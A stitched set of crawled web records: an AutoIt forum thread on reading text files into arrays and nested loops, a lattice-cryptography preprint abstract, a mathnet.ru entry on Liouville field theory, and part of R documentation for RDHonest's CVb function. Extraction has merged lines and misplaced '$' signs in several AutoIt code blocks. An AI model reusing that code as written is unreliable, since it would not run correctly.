Line n of test - Line 2 of text
Line 1 of test - Line 3 of text
Line 2 of test - Line 3 of text
...
Line n of test - Line 3 of text
...
...
Line n of test - Line n of text ; Until we end up here at the last line of both files
So the second value will eventually change, but only every time the first one resets to the first line.
M23
Any of my own code posted anywhere on the forum is available for use by others without any restriction of any kind._______My UDFs:
Spoiler
ArrayMultiColSort ---- Sort arrays on multiple columns
ChooseFileFolder ---- Single and multiple selections from specified path treeview listing
Date_Time_Convert -- Easily convert date/time formats, including the language used
ExtMsgBox --------- A highly customisable replacement for MsgBox
GUIExtender -------- Extend and retract multiple sections within a GUI
GUIFrame ---------- Subdivide GUIs into many adjustable frames
GUIListViewEx ------- Insert, delete, move, drag, sort, edit and colour ListView items
GUITreeViewEx ------ Check/clear parent and child checkboxes in a TreeView
Marquee ----------- Scrolling tickertape GUIs
NoFocusLines ------- Remove the dotted focus lines from buttons, sliders, radios and checkboxes
Notify ------------- Small notifications on the edge of the display
Scrollbars ----------Automatically sized scrollbars with a single command
StringSize ---------- Automatically size controls to fit text
Toast -------------- Small GUIs which pop out of the notification area
##### Share on other sites
Hope this what you want :
#include <array.au3>
#include <file.au3>
$First = FileReadToArray(@ScriptDir & "\FirstValu.txt") If @error Then Else For$i = 0 To UBound($First,2) - 1 ; Loop through the array. Next EndIf$Second = FileReadToArray(@ScriptDir & "\SecondValu.txt")
If @error Then
Else
For $y = 0 To UBound($Second) - 1 ; Loop through the array.
FileWrite(@ScriptDir & "\All.txt",$First[$i]&@CRLF)
FileWrite(@ScriptDir & "\All.txt",$Second[$y])
ExitLoop
; Read File To Array is Done
;~ ExitLoop Dont exit loop unless there is an error handler
Next
EndIf
Tested .
##### Share on other sites
16 hours ago, RyukShini said:
Sorry That was a mistake not to declare.
After declaring the variables it still doesn't work.
$test[$u] does not change its value, it remains the same however $text[$i] changes.
well if you want $text and$test changed their values at the same time you can do like this:
#include <array.au3>
#include <file.au3>
Local $text Local$test
_FileReadToArray(@ScriptDir & "\text.txt", $text) ; read the list of names to array _FileReadToArray(@ScriptDir & "\test.txt",$test) ; read the list of names to array
For $u = 1 To UBound($test) - 1
MsgBox(4096, "Test", $text[$u] & " - " & $test[$u])
Next
ill get to that... i still need to learn and understand a lot of codes
Correct answer, learn to walk before you take on that marathon.
##### Share on other sites
16 hours ago, RyukShini said:
Sorry That was a mistake not to declare.
After declaring the variables it still doesn't work.
$test[$u] does not change its value, it remains the same however $text[$i] changes.
As Melba mentioned (depending on how many strings are in text.txt)
You wont see any change in $test[$u] until the loop has gone through all of text.txt stings. So if its a bumch it may take a while.
Make sense?
I prefer testing stuff like this with Consolewrite so the script doesn't have to stop:
#include <array.au3>
#include <file.au3>
Local $text Local$test
_FileReadToArray(@ScriptDir & "\text.txt", $text) ; read the list of names to array _FileReadToArray(@ScriptDir & "\test.txt",$test) ; read the list of names to array
For $u = 1 To UBound($test) - 1
For $i = 1 To UBound($text) - 1
ConsoleWrite("$text[$i] = " & $text[$i] & "$test[$u] = " & $test[$u])
Next
Next
My Contributions...
# FTP Connection Tester / INI File - Read, Write, Save & Load Example
##### Share on other sites
Thanks a lot !
I got it to work.
## Create an account
Register a new account
• ### Similar Content
• By Jibberish
I am trying to add data to an array and I keep getting the error "Subscript used on non-accessible variable ".
#include <array.au3> ; Includes, etc ~ ~ ~ Local $aOptionsArray[3]$aOptionsArray = CheckboxesAndRadioButtons() _ArrayDisplay($aOptionsArray) Func CheckboxesAndRadioButtons() ; Create Checkboxes and Radio Buttons and read the results ~ ~ ~ ; Radio Buttons to Array ;$aOptions[0] = $bTestSelectForever ;$aOptions[1] = $bTestSelect3Times ;$aOptions[2] = $bTestSelectOnce If$bSelect1 = 1 Then $aOptions[0] = "True" Else$aOptions[0] = "False" <<< This is where the error occurs. EndIf If $bSelect2 = 1 Then$aOptions[1] = "True" Else $aOptions[1] = "False" EndIf If$bSelect3 = 1 Then $aOptions[2] = "True" Else$aOptions[2] = "False" EndIf Return $aOptions EndFunc Is putting data into an array while in a If - Then - Else illegal? • By anoig Hi all, First, I want to give a huge shout-out to the community. I'm completely self-taught, and have never had to actually ask a question before because the forum is that good at answering questions and explaining things. However, I'm kind of stumped here, and I've been stuck on this problem for almost a full day. I'm working on a script to populate drafts of deeds at work. I have the main GUI and a function (ctrl($n) and read()) for adding fields to find and data to replace it with to an array for later use with _word_docfindreplace. All of that works. However, due to the way I have the forms set up, I need to create additional fields and info based on the data that's there. Specifically, if there's only one buyer, I need to add the field [Buyer1&2] and the data in $aArray_Base for [Buyer 1]. I also need to add a field [Buyer 2] and have a blank data set in the next column over in the array, and I need to do the same for the Seller. To this end, the function parties() sets boolean variables$2buyers and $2sellers accordingly. Then, I have buyers() and sellers() to populate the data. The problem that I'm running into is that each function works... when ONLY the buyer 1 name field is filled, and when ONLY the seller 1 field is filled. So if I fill Buyer 1 Name and save it, the data is populated correctly. But when I fill Buyer 1 and Seller 1 name, only the buyer 1 data populates correctly. Worse, when I fill several fields, neither populate correctly. I have no idea why this happens. I've added messageboxes to debug throughout the entire process and can't pinpoint what's causing the issue. The entire script is below. The function(s) in question are buyers() and sellers(). Only Sellers() has messageboxes throughout. Can someone help walk me through what might be causing this and help me find a solution? Thanks a ton in advance, and sorry for the wall of text. -Anoig • By InunoTaishou Cleaning up some old folders and found this little snippit. Think I was using this back when I was trying to create 2d maps for a game I was making in GDI+ (that never got finished). Pretty straight forward, searches an array for an array. #include <Array.Au3> Search() Func Search() Local$aArrayToFind[][] = [["V", "V", "V", "V", "V"], ["V", "V", "V", "V", "V"], ["V", "V", "V", "V", "B"], ["V", "V", "V", "V", "B"], ["V", "V", "V", "V", "B"]] Local $aArrayToSearch[][] = [["R", "R", "R", "R", "R", "R", "R", "R", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "X", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "R", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "X", "V", "V", "V", "V", "X", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "R", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "X", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "R", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "X", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "R", "X", "X", "X", "X", "X", "X", "X", "X", "X", "X", "X", "V", "V", "V", "V", "V", "T", "T", "T", "T", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "R", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "R", "V", "X", "T", "T", "T", "T", "T", "T", "T", "T", "X", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "R", "V", "X", "T", "T", "T", "T", "T", "T", "T", "T", "X", "X", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "B", "B", "B", "B", "B", "B", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "R", "V", "X", "T", "T", "T", "T", "T", "T", "T", "T", "X", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "B", "B", "B", "B", "B", "B", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "R", "V", "X", "T", "T", "T", "T", "T", "T", "T", "T", "X", "X", "V", "V", "V", "X", "B", "B", "B", "B", "B", "V", "V", "V", "V", "B", "B", "B", "B", "B", "B", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "R", "V", "X", "T", "T", "T", "T", "T", "T", "T", "T", "X", "V", "V", "V", "V", "V", "B", "B", "B", "B", "B", "V", "V", "V", "X", "V", "V", "B", "D", "B", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "R", "V", "X", "T", "T", "T", "T", "T", "T", "T", "T", "X", "X", "V", "V", "V", "X", "B", "D", "B", "B", "B", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "R", "V", "X", "T", "T", "T", "T", "T", "T", "T", "T", "X", "V", "V", "V", "V", "V", "V", "V", "V", "X", "X", "L", "L", "L", "L", "L", "L", "L", "L", "L", "L", "L", "L", "L", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "R", "V", "X", "T", "T", "T", "T", "T", "T", "T", "T", "X", "X", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "R", "V", "X", "T", "T", "T", "T", "T", "T", "T", "T", "X", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "V", "V", "V", "X", "T", "T", "T", "T", "T", "T", "T", "T", "X", "X", "V", "V", "V", "V", "V", "V", "V", "V", "V", "X", "X", "X", "X", "X", "X", "X", "X", "X", "X", "X", "X", "X", "T", "T", "T", "T", "T", "T"], _ ["V", "V", "V", "V", "V", "V", "V", "V", "V", "X", "X", "X", "X", "X", "X", "X", "X", "X", "X", "V", "X", "V", "V", "X", "B", "B", "B", "B", "B", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "B", "B", "B", "B", "B", "V", "V", "V", "V", "V", "M", "M", "M", "M", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "X", "B", "D", "B", "B", "B", "V", "V", "V", "V", "V", "M", "M", "M", "M", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "M", "M", "D", "M", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "T", "T", "T", "T", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "C", "C", "C", "C", "C", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "T", "T", "T", "T", "V", "T", "T", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "C", "C", "C", "C", "C", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "V", "V", "V", "V", "V", "T", "T", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "C", "C", "C", "C", "C", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "V", "V", "V", "V", "W", "W", "W", "W", "W", "W", "V", "V", "V", "V", "V", "V", "V", "C", "C", "D", "C", "C", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "V", "V", "V", "V", "W", "W", "W", "W", "W", "W", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "V", "V", "V", "V", "W", "W", "W", "W", "W", "W", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "V", "V", "V", "V", "W", "W", "W", "W", "W", "W", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "L", "L", "L", "L", "W", "W", "W", "W", "W", "W", "L", "L", "L", "V", "V", "V", "L", "L", "L", "L", "L", "L", "L", "L", "L", "L", "L", "L", "L", "L", "L", "L", "L", "L", "L", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "X", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "R", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "T", "T", "T", "T", "T", "T", "T", "T", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "T", "T", "T", "T", "T", "T", "T", "T", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T"], _ ["R", "R", "R", "R", "R", "R", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "V", "V", "V", "V", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T", "T"]] Local$aArrayInArray = ArrayInArray($aArrayToSearch,$aArrayToFind) If (@Error) Then MsgBox("", "Error", "Error doing search: " & @Error) Else If ($aArrayInArray[0] = 1) Then ToolTip("Start Coords = " &$aArrayInArray[1] & ", " & $aArrayInArray[2] & @LF & _ "End Coords = " &$aArrayInArray[1] + UBound($aArrayToFind,$UBOUND_ROWS) - 1 & ", " & $aArrayInArray[2] + UBound($aArrayToFind, $UBOUND_COLUMNS) - 1 & @LF & _ "(Approx) Center coords = " &$aArrayInArray[1] + Int(UBound($aArrayToFind,$UBOUND_ROWS) / 2) & ", " & $aArrayInArray[2] + Int(UBound($aArrayToFind, $UBOUND_COLUMNS) / 2), 0, 0)$aArrayToSearch[$aArrayInArray[1]][$aArrayInArray[2]] = "Start" $aArrayToSearch[$aArrayInArray[1] + UBound($aArrayToFind,$UBOUND_ROWS) - 1][$aArrayInArray[2] + UBound($aArrayToFind, $UBOUND_COLUMNS) - 1] = "End"$aArrayToSearch[$aArrayInArray[1] + Int(UBound($aArrayToFind, $UBOUND_ROWS) / 2)][$aArrayInArray[2] + Int(UBound($aArrayToFind,$UBOUND_COLUMNS) / 2)] = "(Approx) Center" _ArrayDisplay($aArrayToSearch, "ArrayInArray") ElseIf ($aArrayInArray[0] > 1) Then MsgBox("", "Multiple Matches", "Multiple Matches Found For Search") Else MsgBox("", "No Matches", "No Matches Found For Search") EndIf EndIf EndFunc ;==>Start Func ArrayInArray($aArrayToSearch,$aArrayToFind) Local $aReturn[3] = [0, -1, -1] If (Not IsArray($aArrayToSearch)) Then Return SetError(1, 0, $aReturn) If (Not IsArray($aArrayToFind)) Then Return SetError(2, 0, $aReturn) Local$iRowsToSearch = UBound($aArrayToSearch,$UBOUND_ROWS) Local $iColumnsToSearch = UBound($aArrayToSearch, $UBOUND_COLUMNS) Local$iRowsToFind = UBound($aArrayToFind,$UBOUND_ROWS) Local $iColumnsToFind = UBound($aArrayToFind, $UBOUND_COLUMNS) If ($iRowsToFind > $iRowsToSearch) Then Return SetError(3, 0,$aReturn) If ($iColumnsToFind >$iColumnsToSearch) Then Return SetError(4, 0, $aReturn) For$iRow = 0 To $iRowsToSearch -$iRowsToFind For $iColumn = 0 To$iColumnsToSearch - $iColumnsToFind Local$bValid = False For $i = 0 To$iRowsToFind - 1 For $p = 0 To$iColumnsToFind - 1 If ($aArrayToFind[$i][$p] = "" Or$aArrayToFind[$i][$p] = $aArrayToSearch[$iRow + $i][$iColumn + $p]) Then$bValid = True Else $bValid = False ExitLoop 2 EndIf Next Next If ($bValid) Then ; Number of valid results found $aReturn[0] += 1 ; row of the last valid result found$aReturn[1] = $iRow ; column of the last valid result found$aReturn[2] = $iColumn EndIf Next Next Return$aReturn EndFunc ;==>ArrayInArray ArrayInArray Returns an array: [0] = number of results found, [1] = row of the last valid result found, [2] = column of the last valid result found
• By distancesprinter
_ArrayDisplay(\$aArray, "Window Title", "1:", 0, Default, "Column") ; Expected results are rows 1 to the end of the array, all columns. The result is rows 0-1, all columns. The API reference is here:
https://www.autoitscript.com/autoit3/docs/libfunctions/_ArrayDisplay.htm
Am I doing something wrong?
• By LoneWolf_2106
Hi everybody,
i have a question related to strings items in an Array and sorting. Maybe someone can advice me how to solve the issue.
I have an Array of strings, every item of the Array is as following:
INFO [13.06.2017 11:48:01] [Thread-13] [ConGenImpUsb -> waitForConnection] INFO [07.06.2017 08:55:44] [main] MDU5 - Ver 5.1x I want to sort the item in the array by date and time, is there any function which allows me to sort by date/time? | 2017-08-18 07:18:48 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.24405433237552643, "perplexity": 9973.357810061663}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-34/segments/1502886104612.83/warc/CC-MAIN-20170818063421-20170818083421-00087.warc.gz"} |
https://www.techrxiv.org/articles/preprint/Cyclic_Lattices_Ideal_Lattices_and_Bounds_for_the_Smoothing_Parameter/17626391/1 | paper2.pdf (334.5 kB)
Cyclic Lattices, Ideal Lattices and Bounds for the Smoothing Parameter
preprint
posted on 06.01.2022, 05:43 authored by Zhiyong Zheng, Yunfan Lu
Cyclic lattices and ideal lattices were introduced by Micciancio in \cite{D2}, Lyubashevsky and Micciancio in \cite{L1} respectively, which play an efficient role in Ajtai's construction of a collision resistant Hash function (see \cite{M1} and \cite{M2}) and in Gentry's construction of fully homomorphic encryption (see \cite{G}). Let $R=Z[x]/\langle \phi(x)\rangle$ be a quotient ring of the integer coefficients polynomials ring, Lyubashevsky and Micciancio regarded an ideal lattice as the correspondence of an ideal of $R$, but they neither explain how to extend this definition to whole Euclidean space $\mathbb{R}^n$, nor exhibit the relationship of cyclic lattices and ideal lattices.
In this paper, we regard the cyclic lattices and ideal lattices as the correspondences of finitely generated $R$-modules, so that we may show that ideal lattices are actually a special subclass of cyclic lattices, namely, cyclic integer lattices. In fact, there is a one to one correspondence between cyclic lattices in $\mathbb{R}^n$ and finitely generated $R$-modules (see Theorem \ref{th4} below). On the other hand, since $R$ is a Noether ring, each ideal of $R$ is a finitely generated $R$-module, so it is natural and reasonable to regard ideal lattices as a special subclass of cyclic lattices (see corollary \ref{co3.4} below). It is worth noting that we use more general rotation matrix here, so our definition and results on cyclic lattices and ideal lattices are more general forms. As application, we provide cyclic lattice with an explicit and countable upper bound for the smoothing parameter (see Theorem \ref{th5} below). It is an open problem that is the shortest vector problem on cyclic lattice NP-hard? (see \cite{D2}). Our results may be viewed as a substantial progress in this direction.
History
[email protected]
Submitting Author's Institution
renmin university of china
China
Exports
figshare. credit for all your research. | 2022-12-03 05:04:46 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8938682079315186, "perplexity": 582.2943547881536}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710924.83/warc/CC-MAIN-20221203043643-20221203073643-00608.warc.gz"} |
http://www.mathnet.ru/php/archive.phtml?wshow=paper&jrnid=tmf&paperid=604&option_lang=eng | RUS ENG JOURNALS PEOPLE ORGANISATIONS CONFERENCES SEMINARS VIDEO LIBRARY PACKAGE AMSBIB
General information Latest issue Archive Impact factor Subscription Guidelines for authors License agreement Submit a manuscript Search papers Search references RSS Latest issue Current issues Archive issues What is RSS
TMF: Year: Volume: Issue: Page: Find
TMF, 2000, Volume 123, Number 2, Pages 299–307 (Mi tmf604)
The duality of quantum Liouville field theory
L. O'Raifeartaigh, J. M. Pawlowski, V. V. Sreedhar
Abstract: It has been found empirically that the Virasoro center and three-point functions of quantum Liouville field theory with the potential $\exp(2b\phi(x))$ and the external primary fields $\exp(\alpha\phi(x))$ are invariant with respect to the duality transformations $\hbar\alpha\rightarrow q-\alpha$, where $q=b^{-1}+b$. The steps leading to this result (via the Virasoro algebra and three-point functions) are reviewed in the path-integral formalism. The duality occurs because the quantum relationship between the $\alpha$ and the conformal weights $\Delta_\alpha$ is two-to-one. As a result, the quantum Liouville potential can actually contain two exponentials (with related parameters). In the two-exponential theory, the duality appears naturally, and an important previously conjectured extrapolation can be proved.
DOI: https://doi.org/10.4213/tmf604
Full text: PDF file (209 kB)
References: PDF file HTML file
English version:
Theoretical and Mathematical Physics, 2000, 123:2, 663–670
Bibliographic databases:
Citation: L. O'Raifeartaigh, J. M. Pawlowski, V. V. Sreedhar, “The duality of quantum Liouville field theory”, TMF, 123:2 (2000), 299–307; Theoret. and Math. Phys., 123:2 (2000), 663–670
Citation in format AMSBIB
\Bibitem{OraPawSre00} \by L.~O'Raifeartaigh, J.~M.~Pawlowski, V.~V.~Sreedhar \paper The duality of quantum Liouville field theory \jour TMF \yr 2000 \vol 123 \issue 2 \pages 299--307 \mathnet{http://mi.mathnet.ru/tmf604} \crossref{https://doi.org/10.4213/tmf604} \mathscinet{http://www.ams.org/mathscinet-getitem?mr=1794162} \zmath{https://zbmath.org/?q=an:1031.81632} \transl \jour Theoret. and Math. Phys. \yr 2000 \vol 123 \issue 2 \pages 663--670 \crossref{https://doi.org/10.1007/BF02551399} \isi{http://gateway.isiknowledge.com/gateway/Gateway.cgi?GWVersion=2&SrcApp=PARTNER_APP&SrcAuth=LinksAMR&DestLinkType=FullRecord&DestApp=ALL_WOS&KeyUT=000165897000010}
• http://mi.mathnet.ru/eng/tmf604
• https://doi.org/10.4213/tmf604
• http://mi.mathnet.ru/eng/tmf/v123/i2/p299
SHARE:
Citing articles on Google Scholar: Russian citations, English citations
Related articles on Google Scholar: Russian articles, English articles
This publication is cited in the following articles:
1. Blaszak M., “From bi-Hamiltonian geometry to separation of variables: Stationary Harry-Dym and the KdV dressing chain”, Journal of Nonlinear Mathematical Physics, 9 (2002), 1–13, Suppl. 1
2. Blaszak, M, “Separability preserving Dirac reductions of Poisson pencils on Riemannian manifolds”, Journal of Physics A-Mathematical and General, 36:5 (2003), 1337
3. Giribet G.E., Lopez-Fogliani D.E., “Remarks on free field realization of SL(2, R)(k)/U(1) x U(1) WZNW model”, Journal of High Energy Physics, 2004, no. 6, 026
• Number of views: This page: 198 Full text: 95 References: 25 First page: 1 | 2020-01-21 10:54:35 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.1979421079158783, "perplexity": 10789.888572183492}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-05/segments/1579250603761.28/warc/CC-MAIN-20200121103642-20200121132642-00525.warc.gz"} |
https://rdrr.io/github/kolesarm/RDHonest/man/CVb.html | # CVb: Critical values for CIs based on a biased Gaussian estimator. In kolesarm/RDHonest: Honest inference in sharp regression discontinuity designs
## Description
Computes the critical value cv_{1-alpha}(B) that is needed to make the confidence interval X\pm cv have coverage 1-alpha if X is Normally distributed with variance one and maximum bias at most B.
## Usage
1 CVb(B, alpha = 0.05)
## Arguments
B Maximum bias, vector of non-negative numbers. alpha Determines CI level, 1-alpha. Needs to be between 0 and 1. Can be a vector of values.
## Value
Data frame with the following columns:
bias
Value of bias as specfied by bs
alpha
Value of α as specified by alpha
cv
